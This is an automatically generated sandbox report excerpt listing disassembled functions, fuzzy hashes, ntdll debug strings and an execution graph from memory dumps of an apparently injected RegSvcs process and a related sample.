                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 00a9cb94228a8a3da6b0d599cfeff898759a76592288a8c3c77cf60919d53fe4
                                                                          • Instruction ID: 071b3683042e32dc3de661d52b246829bcdc6c4ad80afc81bc787dd594d44329
                                                                          • Opcode Fuzzy Hash: 00a9cb94228a8a3da6b0d599cfeff898759a76592288a8c3c77cf60919d53fe4
                                                                          • Instruction Fuzzy Hash: 4490023120180402D1047158481470B0155A7D0312F59C511B1168A55DC66589527671
                                                                          Function 01522FB0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f0453ec052e0ec3e63ec201e05fa6f59b4556557f171c016dcd18479ef35e222
                                                                          • Instruction ID: 6f80b71689fc2131e2aefcb184575b273d21f182647f7686f5a6274ad203b408
                                                                          • Opcode Fuzzy Hash: f0453ec052e0ec3e63ec201e05fa6f59b4556557f171c016dcd18479ef35e222
                                                                          • Instruction Fuzzy Hash: 80900221601400424144716888449064155BBE1221759C621B099CA50DC59989666765
                                                                          Function 01522FA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7564453647f218b2efd4fd3aa9ed62382f6bbad56ae21e6a060a8f0e2c263b70
                                                                          • Instruction ID: 16fea5f84447348c52f5b292804b281c6e4ca16eec52125a0db7366800558932
                                                                          • Opcode Fuzzy Hash: 7564453647f218b2efd4fd3aa9ed62382f6bbad56ae21e6a060a8f0e2c263b70
                                                                          • Instruction Fuzzy Hash: AD90023120180402D104715848087470155A7D0312F59C511B5168A55EC6A5C9927631
                                                                          Function 01522E30 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5be3849a3290d37e8ca07235e59af4d61ac789b0389b1ef961615db7dc1b7f3
                                                                          • Instruction ID: ecf97e0f5966ad1f283be9da0cc742c6520de8c23468775a53ee836e25fc032a
                                                                          • Opcode Fuzzy Hash: b5be3849a3290d37e8ca07235e59af4d61ac789b0389b1ef961615db7dc1b7f3
                                                                          • Instruction Fuzzy Hash: 0890022130140402D106715844146060159E7D1355F99C512F1428A55DC6658A53B232
                                                                          Function 01522EE0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce723ca176d77921fab5d9ef241b758d678e4f72f859e1e024cd543026a0b3e6
                                                                          • Instruction ID: 76f25f2f432b26129be2ee850780986284dae650c4f6f4c1e5256f59fadf9da6
                                                                          • Opcode Fuzzy Hash: ce723ca176d77921fab5d9ef241b758d678e4f72f859e1e024cd543026a0b3e6
                                                                          • Instruction Fuzzy Hash: 7990026120180403D144755848046070155A7D0312F59C511B2068A55ECA698D527235
                                                                          Function 01522E80 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb6d2fe06ca5c81615fc685c4389817af658698ec4a06691646ee2d2674a2727
                                                                          • Instruction ID: 1d4fa4df26166518739b4c4a754f45565ab63bae3505de43eb468926c4e4d4f4
                                                                          • Opcode Fuzzy Hash: cb6d2fe06ca5c81615fc685c4389817af658698ec4a06691646ee2d2674a2727
                                                                          • Instruction Fuzzy Hash: AA90022160140502D10571584404616015AA7D0251F99C522B1028A55ECA658A93B231
                                                                          Function 01522EA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5db67347b3ec0295675de8883a9d07a8cc576756e4530a0750c43c0ab0c413d1
                                                                          • Instruction ID: 4e7288aac5815d38fb82c1c217481c6d97342514c088dad8d11f467643d17d24
                                                                          • Opcode Fuzzy Hash: 5db67347b3ec0295675de8883a9d07a8cc576756e4530a0750c43c0ab0c413d1
                                                                          • Instruction Fuzzy Hash: 5F90027120140402D144715844047460155A7D0311F59C511B5068A54EC6998ED67765
                                                                          Function 01523010 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1698e396d99d78dfcefbd1f117da311464f2f7d07000f708334c7cdb806330a
                                                                          • Instruction ID: 2704b5603b130c0173d4b679840505a028966a03bafb8bbb8a47722f655851b1
                                                                          • Opcode Fuzzy Hash: c1698e396d99d78dfcefbd1f117da311464f2f7d07000f708334c7cdb806330a
                                                                          • Instruction Fuzzy Hash: 0990022120184442D14472584804B0F4255A7E1212F99C519B415AA54CC95589566721
                                                                          Function 01523090 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f17f2203425f4bde931fa19b5ee6fc41144e71213608dbd2eda97c27f591e884
                                                                          • Instruction ID: 5e6371588a06abcfc494cec988efdc31773c943ea8f7e3e0ef42a1343358007a
                                                                          • Opcode Fuzzy Hash: f17f2203425f4bde931fa19b5ee6fc41144e71213608dbd2eda97c27f591e884
                                                                          • Instruction Fuzzy Hash: B990022124140802D144715884147070156E7D0611F59C511B0028A54DC6568A6677B1
                                                                          Function 015239B0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0511d18a04e87726995adeae9c4e2bbbd4328c59468a7530801ab1959fa06cc
                                                                          • Instruction ID: 8ef994b424e275a7ec3d59b41f469d62e8f15a6e7a2fef9f09857af9a7ab6a0c
                                                                          • Opcode Fuzzy Hash: c0511d18a04e87726995adeae9c4e2bbbd4328c59468a7530801ab1959fa06cc
                                                                          • Instruction Fuzzy Hash: 3A90022124545102D154715C44046164155B7E0211F59C521B0818A94DC59589567321
                                                                          Function 01523D70 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d35137d303176c24bc678ff9d8d52a0e2e25041151f4405c14155c327301f5d
                                                                          • Instruction ID: 9de7dc5e353c01eadbb2c7efe10466057d9c06c96d7f65774f3e885bd8a5952a
                                                                          • Opcode Fuzzy Hash: 4d35137d303176c24bc678ff9d8d52a0e2e25041151f4405c14155c327301f5d
                                                                          • Instruction Fuzzy Hash: 8C90023520140402D514715858046460196A7D0311F59D911B0428A58DC69489A2B221
                                                                          Function 01523D10 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 527c4475a619353085beb6a3a1d06cfbd8439433289793a435251a69bd12e0ac
                                                                          • Instruction ID: ae55a6fa792b363798389803d76fd31107cb900fc3785dc4a96d02b8672de84f
                                                                          • Opcode Fuzzy Hash: 527c4475a619353085beb6a3a1d06cfbd8439433289793a435251a69bd12e0ac
                                                                          • Instruction Fuzzy Hash: 5B90023120240142954472585804A4E4255A7E1312B99D915B0019A54CC95489626321
                                                                          Function 01522C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 81e4daad23eb05767181d12090ced7ee78b0ff0d4931b5babe844c99ca88d385
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Function 01522890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 2acaebc42c6118ea68b092a99cd69476bf5c5b3b5d92293dc09ada1f681fc724
                                                                          • Instruction ID: 6b51b301014507e82b0a822b5e40d77f4eae009c2a7903f49451798114ba0011
                                                                          • Opcode Fuzzy Hash: 2acaebc42c6118ea68b092a99cd69476bf5c5b3b5d92293dc09ada1f681fc724
                                                                          • Instruction Fuzzy Hash: 6751C8B6A04226AECF21DF5C899097EFBB8BB49240B54822AF455DB681D374DE4087A0
                                                                          Function 01592410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: d3a960f4e101155bce0d7e3674646af85dfa2eda24bfb64b2c0c6e8669741d90
                                                                          • Instruction ID: b7e22e2a9e518d3517cf0614afa5481949ba1c57c89295253ef398cbb6ff0306
                                                                          • Opcode Fuzzy Hash: d3a960f4e101155bce0d7e3674646af85dfa2eda24bfb64b2c0c6e8669741d90
                                                                          • Instruction Fuzzy Hash: C551E7B5A00646BECF34DF5DC89097EB7F8FB44200F14885AE59ADF682E674DA408761
                                                                          Function 01517630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Execute=1, xrefs: 01554713
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01554655
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015546FC
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01554725
                                                                          • ExecuteOptions, xrefs: 015546A0
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01554787
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01554742
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: 45246fc58459787e3408525ccf7f9b630647b7b163f471eb3de6e3043996ad51
                                                                          • Instruction ID: 69d8e31283e0b785264e4b8071e01b2e2a200b41571e39d328749287ef16fba0
                                                                          • Opcode Fuzzy Hash: 45246fc58459787e3408525ccf7f9b630647b7b163f471eb3de6e3043996ad51
                                                                          • Instruction Fuzzy Hash: A8514D31A0021ABBFF22ABADDC95FAD77A8FF58700F14089ED505AF191E7709A458F50
                                                                          Function 0152B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: ca1fc1c9bf37dae2242becca769166751ff5524071dfde9e79ac07e6ca9d73fc
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: A081C372E0526A9EEF298E6CC8917FEBBB1BF46310F1C4619D861AF2D1C7749840CB51
                                                                          Function 015920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          • Opcode ID: c06a30aa704558754d3e9fef5f8c35e44b1ef9908e86f12203de8eb15a57d3d1
                                                                          • Instruction ID: 3ce6d2ff48bf743882553adb1a51d22c5e66c193fb071c0a91f80fce17436c32
                                                                          • Opcode Fuzzy Hash: c06a30aa704558754d3e9fef5f8c35e44b1ef9908e86f12203de8eb15a57d3d1
                                                                          • Instruction Fuzzy Hash: BB2165BAE0021AABDF10DF79DC40AEEBBF8FF54650F55011AE905E7240E730D9119BA1
                                                                          Function 0150F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015502E7
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015502BD
                                                                          • RTL: Re-Waiting, xrefs: 0155031E
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: e471bf4ff32bf7497ad8d6a9ea9ae8bb2e4716777928f39cea1ba6cafe8322ab
                                                                          • Instruction ID: 8064149a41174d3c3281cab55e433ce44914e4592902b3cd51456716c8678e61
                                                                          • Opcode Fuzzy Hash: e471bf4ff32bf7497ad8d6a9ea9ae8bb2e4716777928f39cea1ba6cafe8322ab
                                                                          • Instruction Fuzzy Hash: 32E19B316087429FD766CF68C894B2ABBE0BF84314F140A2EF9A58F2E1D774D945CB42
                                                                          Function 0151BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Resource at %p, xrefs: 01557B8E
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01557B7F
                                                                          • RTL: Re-Waiting, xrefs: 01557BAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: 74a094cfb891b7ab5b0baed89f6b217176cfcdcc4fee4b00b8fdddd57d2849ff
                                                                          • Instruction ID: 4a3f679216b8bb8d7e22fd987b07d60c5eb22af5a66df37dd16cbc2fc0118343
                                                                          • Opcode Fuzzy Hash: 74a094cfb891b7ab5b0baed89f6b217176cfcdcc4fee4b00b8fdddd57d2849ff
                                                                          • Instruction Fuzzy Hash: E741B1357007039FE721DE29D850B6AB7E5FB98720F100A1EF966DF690EB71E4058B91
                                                                          Function 0151B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0155728C
                                                                          Strings
                                                                          • RTL: Resource at %p, xrefs: 015572A3
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01557294
                                                                          • RTL: Re-Waiting, xrefs: 015572C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: 3064b24cbc7d3f26a3af04bbf52903f6bd4f437c03bd48b7d1ff1ed9391db03f
                                                                          • Instruction ID: 80e493b34541b20404336bef5492e94cd68b56214c22e733721dd7d8f78bb72f
                                                                          • Opcode Fuzzy Hash: 3064b24cbc7d3f26a3af04bbf52903f6bd4f437c03bd48b7d1ff1ed9391db03f
                                                                          • Instruction Fuzzy Hash: 2341D235640203ABD721DE29CC41F6AB7A6FB98750F104A1AFD55EF280DB71E8428BE1
                                                                          Function 01592300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: 503f77afb5c35a6ccd3314e2e407936479ce9c7469b2f07cffa506218d28e1f3
                                                                          • Instruction ID: 7dcae44a95dc22a753cb87a78586c3298e90519941c2afbf916f5bc732cd37e9
                                                                          • Opcode Fuzzy Hash: 503f77afb5c35a6ccd3314e2e407936479ce9c7469b2f07cffa506218d28e1f3
                                                                          • Instruction Fuzzy Hash: 5E316472A00219AFDF20DE2DDC40BEEB7F8FB54610F54455AE949E7240EB30AA448BA1
                                                                          Function 01527D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: 3129cf2f97a44cc093f74d49f0dd093f491d9415d5b79de7ac7018faeeb6fdf1
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: 0291C673E042369FDB24DF6DC881ABEBBE1BF5A320F14451AE965AF2C0D73099408761
                                                                          Function 014E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: ea93ac84c6ae3ac913497d920aea037ae7ab7b18f55b756d42167924fc586195
                                                                          • Instruction ID: 4146056dbdfb63ec3050a2364081013f20f05d27f5b6c9264c7b02eaf0e7fbc3
                                                                          • Opcode Fuzzy Hash: ea93ac84c6ae3ac913497d920aea037ae7ab7b18f55b756d42167924fc586195
                                                                          • Instruction Fuzzy Hash: BF811B71D002699BDB31CB54CC44BEEBBB4BB48754F0541DAEA19BB290D7309E85CFA0

                                                                          Execution Graph

                                                                          Execution Coverage:9.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:56
                                                                          Total number of Limit Nodes:4
                                                                          execution_graph 22909 274b1d0 22912 274b2b7 22909->22912 22910 274b1df 22914 274b2c8 22912->22914 22913 274b2fc 22913->22910 22914->22913 22915 274b500 GetModuleHandleW 22914->22915 22916 274b52d 22915->22916 22916->22910 22917 274d560 22918 274d5a6 22917->22918 22921 274d740 22918->22921 22924 274d308 22921->22924 22925 274d7a8 DuplicateHandle 22924->22925 22926 274d693 22925->22926 22927 55f6c48 22928 55f6c82 22927->22928 22929 55f6cfe 22928->22929 22930 55f6d13 22928->22930 22935 55f41c4 22929->22935 22931 55f41c4 3 API calls 22930->22931 22934 55f6d22 22931->22934 22937 55f41cf 22935->22937 22936 55f6d09 22937->22936 22940 55f7668 22937->22940 22946 55f7657 22937->22946 22943 55f7682 22940->22943 22952 55f420c 22940->22952 22942 55f768f 22942->22936 22943->22942 22944 55f76b8 CreateIconFromResourceEx 22943->22944 22945 55f7736 22944->22945 22945->22936 22947 55f420c CreateIconFromResourceEx 22946->22947 22949 55f7682 22947->22949 22948 55f768f 22948->22936 22949->22948 22950 55f76b8 CreateIconFromResourceEx 22949->22950 22951 55f7736 22950->22951 22951->22936 22953 55f76b8 CreateIconFromResourceEx 22952->22953 22954 55f7736 22953->22954 22954->22943 22955 2744668 22956 2744684 22955->22956 22957 27446a4 22956->22957 22959 2744838 22956->22959 22960 274485d 22959->22960 22964 2744937 22960->22964 22968 2744948 22960->22968 22965 274496f 22964->22965 22967 2744a4c 22965->22967 22972 2744544 22965->22972 22969 274496f 22968->22969 22970 2744a4c 22969->22970 22971 2744544 CreateActCtxA 22969->22971 22970->22970 22971->22970 22973 2745dd8 CreateActCtxA 22972->22973 22975 2745e9b 22973->22975 22975->22975 22976 55f67e0 22977 55f67fd 22976->22977 22979 55f419c 22976->22979 22980 55f6818 DrawTextExW 22979->22980 22982 55f68be 22980->22982 22982->22977

                                                                          Executed Functions

                                                                          Function 0274B2B7 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 530 274b2b7-274b2c6 531 274b2c8-274b2c9 530->531 532 274b2ca-274b2d7 530->532 531->532 533 274b303-274b307 532->533 534 274b2d9-274b2e6 call 2749d40 532->534 536 274b309-274b313 533->536 537 274b31b-274b35c 533->537 541 274b2fc 534->541 542 274b2e8 534->542 536->537 543 274b35e-274b366 537->543 544 274b369-274b377 537->544 541->533 589 274b2ee call 274b560 542->589 590 274b2ee call 274b550 542->590 543->544 545 274b379-274b37e 544->545 546 274b39b-274b39d 544->546 548 274b380-274b387 call 274af58 545->548 549 274b389 545->549 551 274b3a0-274b3a7 546->551 547 274b2f4-274b2f6 547->541 550 274b438-274b4f8 547->550 553 274b38b-274b399 548->553 549->553 582 274b500-274b52b GetModuleHandleW 550->582 583 274b4fa-274b4fd 550->583 554 274b3b4-274b3bb 551->554 555 274b3a9-274b3b1 551->555 553->551 556 274b3bd-274b3c5 554->556 557 274b3c8-274b3d1 call 274af68 554->557 555->554 556->557 563 274b3d3-274b3db 557->563 564 274b3de-274b3e3 557->564 563->564 565 274b3e5-274b3ec 564->565 566 274b401-274b405 564->566 565->566 568 274b3ee-274b3fe call 274af78 call 274af88 565->568 587 274b408 call 274b860 566->587 588 274b408 call 274b832 566->588 568->566 571 274b40b-274b40e 572 274b410-274b42e 571->572 573 274b431-274b437 571->573 572->573 584 274b534-274b548 582->584 585 274b52d-274b533 582->585 583->582 585->584 587->571 588->571 589->547 590->547
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
